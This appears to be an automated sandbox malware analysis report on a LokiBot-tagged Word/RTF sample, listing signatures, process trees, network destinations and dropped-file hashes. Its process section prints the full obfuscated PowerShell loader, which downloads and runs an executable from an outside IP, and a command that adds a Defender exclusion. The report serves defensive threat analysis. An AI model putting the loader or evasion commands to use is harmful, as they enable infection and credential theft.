Malware Analysis Report

2025-04-03 09:50

Sample ID 241121-fpjp6aycqe
Target 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.doc
SHA256 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
Tags
lokibot collection defense_evasion discovery execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1

Threat Level: Known bad

The file 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.doc was found to be: Known bad.

Malicious Activity Summary

lokibot collection defense_evasion discovery execution spyware stealer trojan

Lokibot

Lokibot family

Evasion via Device Credential Deployment

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

outlook_win_path

Suspicious behavior: AddClipboardFormatListener

outlook_office_path

Launches Equation Editor

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 05:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 05:02

Reported

2024-11-21 05:05

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.rtf"

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
N/A N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2576 set thread context of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wininit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\wininit.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 320 wrote to memory of 2688 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\mshta.exe
PID 320 wrote to memory of 2688 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\mshta.exe
PID 320 wrote to memory of 2688 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\mshta.exe
PID 320 wrote to memory of 2688 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\mshta.exe
PID 2688 wrote to memory of 2808 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2688 wrote to memory of 2808 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2688 wrote to memory of 2808 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2688 wrote to memory of 2808 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2808 wrote to memory of 2088 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 2088 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 2088 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 2088 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 1252 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2808 wrote to memory of 1252 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2808 wrote to memory of 1252 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2808 wrote to memory of 1252 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1252 wrote to memory of 2604 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1252 wrote to memory of 2604 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1252 wrote to memory of 2604 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1252 wrote to memory of 2604 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2512 wrote to memory of 1272 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2512 wrote to memory of 1272 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2512 wrote to memory of 1272 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2512 wrote to memory of 1272 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2808 wrote to memory of 2576 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2808 wrote to memory of 2576 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2808 wrote to memory of 2576 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2808 wrote to memory of 2576 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.rtf"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"

C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe

"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xgmcc-rp.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF30.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEF2F.tmp"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

Network

Country Destination Domain Proto
US 66.63.187.231:80 66.63.187.231 tcp
US 66.63.187.231:80 66.63.187.231 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp

Files

memory/2512-0-0x000000002F981000-0x000000002F982000-memory.dmp

memory/2512-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2512-2-0x00000000710FD000-0x0000000071108000-memory.dmp

C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta

MD5 ec0d423a3f72d69975a1e31a275f5377
SHA1 213922fb8456ecaadc24889afec1ac6ef5010c68
SHA256 9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
SHA512 8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 a34ac71400d222f400e4f0a1aa3b7e24
SHA1 e10eb1a6b583805012d6b32e48ed7583f28924af
SHA256 eb7f05c333b827a314fd3967613890e68338dedd3db7a9dccf97ee7217be41b1
SHA512 0baa4cd30c091dfc81987ccbba4262cabd6f2bebd23a11bf033245d093ad9f08236fcc6e5bf377f7ed1447b44dfbf75de75540dea0519f9c3f234e2877ae48bf

\??\c:\Users\Admin\AppData\Local\Temp\xgmcc-rp.cmdline

MD5 03cc27246d73effddabcde0c807b3ca0
SHA1 8f32dc674e23ad6ab55fa0434c79f11eb3e3b95e
SHA256 b90f9b503065cd1bc445cfcb568cac7f3015b25fff1b9bd5a509ca29f7abaca6
SHA512 1a64ef59acc448c8bda48f92bdcc93a133a3e609afe5933f2104248e8c2964ede6ee99d4d965ca0f17365d53ed15d53e97a2de1be68437e0305863f7e0eb84a2

\??\c:\Users\Admin\AppData\Local\Temp\xgmcc-rp.0.cs

MD5 b0517586f4097114e790c61f2685f0d5
SHA1 20f7482298ab96731228ebd5242ceddfd72ff50f
SHA256 a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237
SHA512 c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0

\??\c:\Users\Admin\AppData\Local\Temp\CSCEF2F.tmp

MD5 a99eb9ea198acaedd5077eed8303179a
SHA1 d394d42b44edca1fe0d5ec37f7d214f41d0df184
SHA256 d5aed99214eb726589da2e693c0e5d3d9dcef4c875c310327672ca04d9e79cdc
SHA512 4eaefef8756bab8364bdbc081066d7e172fb043f4001d221c796564dd7d4b1f217f1d3373470bad71717656c1cc46645a4d4c1a2ebc263133ec0def71030ffad

C:\Users\Admin\AppData\Local\Temp\RESEF30.tmp

MD5 263725a648fa08c47ff7e93f6ae6d9c0
SHA1 ee2c49bfe3c908be90f840a82d55d572e0796d22
SHA256 033ea33d1de91319919c2fe2bbeb7e26e9fc737a361f0bf1cb82e5800b29dae8
SHA512 62d0a5030f61206cdf3cc7114d10fa6f9eb31489cb06e3db170b424eb97b1f7566363ba9e25b2164e54113c91f5bee23715230a78e72d4c92a8b24827678a3a9

C:\Users\Admin\AppData\Local\Temp\xgmcc-rp.dll

MD5 c5f00bb6591de7e8babb742aa2484bc5
SHA1 82c7f4061ae27f8aaedf321abc5cafaef0d62ce5
SHA256 b9a7fedec9b243cc52623cf2a0d2c40666b06070122ab8f972e1cddde381c53f
SHA512 4881d72b592f6bd127fa5b11e8baa31fd17213051460ea91f2a72723332aec0a9f2a0fd7dfec6a99d76a0437f1f94ed1618b0dabf212462bbf1c8518c854aabb

C:\Users\Admin\AppData\Local\Temp\xgmcc-rp.pdb

MD5 5c91fa3698eaa494e7bdeff3900f498d
SHA1 1771bf5cf61301c1202fc69fc7c9cb1cb062cc46
SHA256 d7acde1a4c82c2541f3135f760d937280df2247dbabf89928c70785b73c2944c
SHA512 32c228aed04738ffeff1ce0dfcf8332c2e4256e4c4863fcc105528460a4016c894eaac0b5def24dd75b44d659daaf706dbe318d98f60c946618dc21510013eab

memory/2512-42-0x00000000710FD000-0x0000000071108000-memory.dmp

C:\Users\Admin\AppData\Roaming\wininit.exe

MD5 66b03d1aff27d81e62b53fc108806211
SHA1 2557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA256 59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA512 9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

memory/2576-56-0x0000000000890000-0x0000000000928000-memory.dmp

memory/2576-57-0x0000000000320000-0x0000000000332000-memory.dmp

memory/2576-58-0x0000000004510000-0x0000000004574000-memory.dmp

memory/964-61-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/964-72-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/964-71-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/964-69-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/964-67-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/964-74-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/964-65-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/964-63-0x0000000000400000-0x00000000004A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1488793075-819845221-1497111674-1000\0f5007522459c86e95ffcc62f32308f1_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1488793075-819845221-1497111674-1000\0f5007522459c86e95ffcc62f32308f1_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/964-98-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/964-107-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 05:02

Reported

2024-11-21 05:05

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

141s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.rtf" /o ""

Network

Country Destination Domain Proto
